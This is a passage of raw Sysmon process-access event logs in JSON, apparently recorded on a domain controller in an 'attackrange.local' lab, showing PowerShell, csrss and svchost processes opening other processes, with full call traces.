C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-001016A60700}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342fc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1ab57|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1a127","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.906","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-00109D990700}","SourceProcessId":"3260","SourceThreadId":"4256","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-001016A60700}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98992f4b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97df488c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e52d5b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e363c0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e36251|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e281d6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34709|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e342fc|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e34025|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e33cf6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+988e510b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1ab57|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97e1a127","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4831,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.906\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0323-5F25-0000-001016A60700}\r\nTargetProcessId: 3396\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.906","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0323-5F25-0000-001016A60700}","TargetProcessId":"3396","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4832,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4833,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4834,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4835,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4836,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:35.906","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:35","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4837,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:35.906\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: 